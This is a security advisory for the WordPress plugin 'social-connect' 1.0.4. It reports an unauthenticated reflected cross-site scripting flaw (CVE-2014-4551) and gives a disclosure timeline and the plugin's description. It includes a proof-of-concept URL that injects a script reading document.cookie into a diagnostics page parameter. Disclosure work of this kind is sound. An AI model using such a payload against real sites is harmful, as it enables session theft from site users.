wp-plugin : social-connect

Plugin Details
Plugin Name: wp-plugin : social-connect
Effected Version : 1.0.4 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/socialconnect/diagnostics/test.php?testing=testing%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4551
Plugin Description :
[| Social Connect adds social login buttons on the login, register and comment forms of your WordPress site. The buttons offer login and registration using a Twitter, Facebook, Google, Yahoo or WordPress.com account. It makes it super easy for new members to register with your site and existing members to login. = Props = Special thanks to: * [markusdrake](http://wordpress.org/support/profile/markusdrake) for patches and helping in the support forums; * [L D](http://wordpress.org/support/profile/enochfung) for patches and helping in the support forums; * [Geodanny](http://wordpress.org/support/profile/geodanny) for helping in the support forums; and * [Wirone](http://blog.wirone.info/) for polish translation and patches. And everyone else in the forums sharing the fixes they find and answering each others questions. = Contribute = Social Connect is rapidly growing in popularity and help with the growing pains is appreciated. If you're a developer, you can contribute fixes & optimisations via [Social Connect on GitHub](https://github.com/thenbrent/social-connect). Everyone can help out by answering questions in the [Support Forums](http://wordpress.org/tags/social-connect?forum_id=10#postform). ]